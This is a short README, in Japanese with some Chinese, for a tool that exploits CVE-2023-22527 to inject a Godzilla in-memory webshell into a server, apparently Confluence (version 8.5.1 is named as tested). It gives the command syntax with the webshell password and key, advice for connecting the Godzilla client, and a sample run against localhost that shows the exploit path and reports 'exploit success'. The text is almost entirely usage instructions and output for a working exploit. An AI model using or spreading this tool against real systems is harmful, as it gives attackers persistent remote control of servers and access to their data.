
CVE-2023-22527 メモリ馬注入ツール
ps: テストバージョンは 8.5.1 です。他のバージョンでも動作するはずですが、テストはしていません。
内容参考北辰师傅之前的工具
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url 哥斯拉密码 哥斯拉密钥
example
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/ pass key
メモリシェルの注入に成功したが Godzilla に接続できない場合は、リクエスト設定に以下のプロトコルヘッダーを追加するか、Godzilla に Burp プロキシを設定してください。
Connection: close
$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key
